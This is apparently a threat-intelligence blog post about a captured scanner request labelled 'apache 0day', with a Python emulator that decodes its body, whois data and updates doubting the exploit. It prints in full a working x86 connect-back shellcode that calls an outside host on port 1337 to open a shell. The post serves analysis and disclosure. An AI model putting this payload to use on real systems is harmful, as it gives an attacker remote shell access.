Friday, 1 January 2016

185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]

BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/&#736%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*

31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c951516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd8031c0b001cd80

END OF DATA
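The first thing to settle about a request like this is what the hex in the body actually does, and the safe way to find out is to emulate it rather than run it. The script below is an added example written for this page, not code from the original post or from whoever sent the request: a tiny x86 emulator that covers only the opcodes stack-building socket shellcode uses (register-to-register xor/cmp/mov, push, mov r8,imm8, je, int 0x80) and records every syscall instead of performing it. The payload constant is the page's hex with the wrapped lines joined and the stray space removed; the stack top address and the faked syscall return values (fd 3 from socket(), 0 from everything else) are assumptions of the emulator, not facts from the capture.

```python
import struct

# Constructed copy of the request body as transcribed on the page (wrapped
# lines joined, stray space removed); the 0xBFFFF000 stack top is an assumption.
PAYLOAD_HEX = (
    "31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c951516848e51cb9"
    "66680539b102665189e7b31053575289e1b303b066cd8031c939c1740631c0b001cd8031c0"
    "b03f89d3cd8031c0b03f89d3b101cd8031c0b03f89d3b102cd8031c031d250686e2f736868"
    "2f2f626989e3505389e1b00bcd8031c0b001cd80"
)
REG = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # x86 encoding order
SYSCALL = {1: "exit", 11: "execve", 63: "dup2", 102: "socketcall"}
SOCKETCALL = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept"}

class MiniX86:
    # Register-only operands, ZF as the only flag, faked syscall return values.
    def __init__(self):
        self.r = dict.fromkeys(REG, 0)
        self.r["esp"] = 0xBFFFF000
        self.mem, self.zf, self.syscalls = {}, False, []

    def push(self, value, size=4):
        self.r["esp"] -= size
        for i, b in enumerate(value.to_bytes(size, "little")):
            self.mem[self.r["esp"] + i] = b

    def read(self, addr, size):
        return bytes(self.mem.get(addr + i, 0) for i in range(size))

    def step(self, code, ip):
        # Execute one instruction; return the next ip, or None once execve/exit ran.
        op, nxt = code[ip], (code[ip + 1] if ip + 1 < len(code) else 0)
        if op == 0x66 and nxt == 0x68:                       # push imm16
            self.push(struct.unpack_from("<H", code, ip + 2)[0], 2)
            return ip + 4
        if op == 0x66 and 0x50 <= nxt <= 0x57:               # push r16
            self.push(self.r[REG[nxt - 0x50]] & 0xFFFF, 2)
            return ip + 2
        if op in (0x31, 0x39, 0x89) and nxt >> 6 == 3:       # xor/cmp/mov reg, reg
            dst, src = REG[nxt & 7], REG[(nxt >> 3) & 7]
            if op == 0x31:
                self.r[dst] ^= self.r[src]
            elif op == 0x39:
                self.zf = self.r[dst] == self.r[src]
            else:
                self.r[dst] = self.r[src]
            return ip + 2
        if 0x50 <= op <= 0x57:                               # push r32
            self.push(self.r[REG[op - 0x50]])
            return ip + 1
        if 0xB0 <= op <= 0xB3:                               # mov al/cl/dl/bl, imm8
            self.r[REG[op - 0xB0]] = (self.r[REG[op - 0xB0]] & 0xFFFFFF00) | nxt
            return ip + 2
        if op == 0x68:                                       # push imm32
            self.push(struct.unpack_from("<I", code, ip + 1)[0])
            return ip + 5
        if op == 0x74:                                       # je rel8
            return ip + 2 + (struct.unpack_from("<b", code, ip + 1)[0] if self.zf else 0)
        if op == 0xCD and nxt == 0x80:                       # int 0x80
            return ip + 2 if self.syscall() else None
        raise ValueError(f"unsupported opcode {op:#04x} at offset {ip}")

    def syscall(self):
        # Record what int 0x80 asks for; socket() "returns" fd 3, the rest 0.
        name = SYSCALL.get(self.r["eax"], f"sys_{self.r['eax']}")
        if name in ("execve", "exit"):                       # both end the trace
            path = self.read(self.r["ebx"], 64).split(b"\0")[0].decode("ascii", "replace")
            self.syscalls.append((name, path if name == "execve" else self.r["ebx"]))
            return False
        if name == "socketcall":
            call = SOCKETCALL.get(self.r["ebx"], f"socketcall#{self.r['ebx']}")
            args = [struct.unpack("<I", self.read(self.r["ecx"] + 4 * i, 4))[0]
                    for i in range(3)]
            if call in ("bind", "connect"):                  # decode the sockaddr_in
                sa = self.read(args[1], 8)                   # family, port (network order), ip
                args = [args[0], struct.unpack("<H", sa[:2])[0],
                        ".".join(str(b) for b in sa[4:8]), struct.unpack(">H", sa[2:4])[0]]
            self.syscalls.append((call, *args))
            self.r["eax"] = 3 if call == "socket" else 0
        elif name == "dup2":
            self.syscalls.append(("dup2", self.r["ebx"], self.r["ecx"]))
            self.r["eax"] = self.r["ecx"]
        else:
            raise ValueError(f"unmodelled syscall {name}")
        return True

def trace_shellcode(hex_payload):
    cpu, code, ip = MiniX86(), bytes.fromhex(hex_payload), 0
    while ip is not None and ip < len(code):
        ip = cpu.step(code, ip)
    return cpu.syscalls

def connect_back_target(hex_payload):
    hits = [(c[3], c[4]) for c in trace_shellcode(hex_payload) if c[0] == "connect"]
    return hits[0] if hits else None  # (ip, port) of the first connect(), else None

if __name__ == "__main__":
    print(*trace_shellcode(PAYLOAD_HEX), sep="\n")
```

Run as-is it prints the trace: socket(2, 1, 6), connect(3, AF_INET, 72.229.28.185, 1337), dup2(3, 0), dup2(3, 1), dup2(3, 2), execve("//bin/sh"). In other words the body is a plain Linux x86 connect-back shell to 72.229.28.185:1337, with the je after connect() skipping an exit() on failure; that all 131 bytes disassemble cleanly end to end is a good sign the transcription is intact. Note what is not here: nothing in the request makes Apache execute its body, so the shellcode only matters if some separate, unshown bug delivers it, which is why the doubt in the update at the end of the post is justified. The tracer deliberately raises on anything it does not model rather than guessing, so a payload that uses memory operands or other syscalls will stop with an error instead of a wrong answer.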

185.130.5[.]224

Whois Data (TeamCymru)
  • AS: 203569
  • IP: 185.130.5.224
  • BGP Prefix: 185.130.5.0/24
  • CC: LT
  • Registry: ripencc
  • Allocated: 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd, LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
Dynamic Source: SANS Internet Storm Center (ISC)
  • Comment: IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.224

UPDATE:
The vulnerability (if it exists at all and is not just a marketing stunt to collect Twitter followers) is not reflected by any entry on exploit-db.com or 0day.today. The captured request itself is a GET to /server-status (mod_status) with nonsense query parameters and a raw shellcode body; nothing in it would make a stock Apache execute that body, so on its own it is a scanner probe, not evidence of a working exploit.

UPDATE 2: (Thanks to @DanielRufde)

 https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0